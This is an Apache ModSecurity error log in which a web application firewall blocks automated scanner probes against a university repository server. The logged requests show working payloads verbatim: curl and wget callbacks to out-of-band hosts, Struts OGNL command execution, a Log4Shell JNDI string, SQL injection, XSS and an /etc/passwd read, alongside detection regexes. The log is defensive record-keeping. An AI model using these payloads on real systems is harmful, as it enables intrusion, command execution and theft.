[Tue Aug 29 11:33:42.337572 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/test-cgi"] [unique_id "ZO11JsCo-f0AAARjjQAAAAAL"]
[Tue Aug 29 11:33:45.463033 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:topicId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:topicId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/widgets/knowledgebase"] [unique_id "ZO11KcCo-f0AAASEJPAAAAAE"]
[Tue Aug 29 11:33:47.327764 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgarten1uson1jz.oast.site -H 'User-Agent: CRvF1U' #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO11K8Co-f0AAASAHdIAAAAH"]
[Tue Aug 29 11:33:47.373731 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:calendarId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (5440=5440 found within ARGS:calendarId: 1) AND (SELECT 2065 FROM (SELECT(SLEEP(6)))jtGw) AND (5440=5440"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11K8Co-f0AAARjjRkAAAAL"]
[Tue Aug 29 11:33:48.379139 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlg6ux1dokbw8gtj.oast.site -H 'User-Agent: CRvF1U'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO11LMCo-f0AAAR@KIIAAAAF"]
[Tue Aug 29 11:33:48.397649 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "repositoryfh.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LMCo-f0AAANsAlwAAAAD"]
[Tue Aug 29 11:33:49.365424 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "repositoryfh.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11LcCo-f0AAANsAl8AAAAD"]
[Tue Aug 29 11:33:50.335715 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccess [hostname "repositoryfh.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LsCo-f0AAANsAmIAAAAD"]
[Tue Aug 29 11:33:50.342654 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:task_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:task_number: 1;curl http:/cjmn8l5jmimk2adbbnlgdbiib1xb4kymp.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/en/php/usb_sync.php"] [unique_id "ZO11LsCo-f0AAARjjScAAAAL"]
[Tue Aug 29 11:33:51.336399 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "repositoryfh.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11L8Co-f0AAAR@KI8AAAAF"]
[Tue Aug 29 11:33:52.451489 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "repositoryfh.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11MMCo-f0AAARQ4DgAAAAB"]
[Tue Aug 29 11:33:52.451808 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:customer_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:customer_number: -1' UNION ALL SELECT NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/mims/updatecustomer.php"] [unique_id "ZO11MMCo-f0AAAR@KJUAAAAF"]
[Tue Aug 29 11:33:53.316467 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sondata[ip]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:sondata[ip]: a|curl cjmn8l5jmimk2adbbnlgcwyk1uhrzbcj8.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/php/ping.php"] [unique_id "ZO11McCo-f0AAARtADcAAAAV"]
[Tue Aug 29 11:33:53.360373 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccessib [hostname "repositoryfh.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11McCo-f0AAARdiNgAAAAK"]
[Tue Aug 29 11:33:53.416721 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:login: ${jndi:ldap://${:-594}${:-752}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgpsqbambxj78om.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/zdm/cxf/login"] [unique_id "ZO11McCo-f0AAAR@KKIAAAAF"]
[Tue Aug 29 11:33:54.363764 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:account. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:account: admin' and  updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/zentao/user-login.html"] [unique_id "ZO11MsCo-f0AAAPDoK0AAAAP"]
[Tue Aug 29 11:33:54.402462 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "repositoryfh.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11MsCo-f0AAARQ4EoAAAAB"]
[Tue Aug 29 11:33:55.323678 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "repositoryfh.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11M8Co-f0AAAQKOq4AAAAs"]
[Tue Aug 29 11:33:55.502527 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:item_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:item_id: 0 union select sleep(5) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO11M8Co-f0AAARy-2IAAAAb"]
[Tue Aug 29 11:33:57.699296 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.set [hostname "repositoryfh.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11NcCo-f0AAASGMroAAAAA"]
[Tue Aug 29 11:33:58.158521 2023] [:error] [pid 1164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:plot. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:plot: ;wget http:/cjmn8l5jmimk2adbbnlg5tb3chrr6hgog.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NsCo-f0AAASMgdcAAAAO"]
[Tue Aug 29 11:33:58.225718 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id_products[]: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(6)))xoOt)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NsCo-f0AAARy-34AAAAb"]
[Tue Aug 29 11:33:59.139213 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');  found within ARGS:options: [\\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO extra_field_options(option_value) VALUES ('2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '2UdxkpHWJwFq0iCfNXfFeNNF0Wt', 16,0) ON DUPLICATE KEY UPDATE     tag='2UdxkpHWJwFq0iCfNXfFeNNF0Wt', field_id=16, count=0;  -- \\x..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASS77wAAAAY"]
[Tue Aug 29 11:33:59.347871 2023] [:error] [pid 1173] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- \\x22] found within ARGS:options: [\\x22test') or 1=1 -- \\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASVoFwAAAAe"]
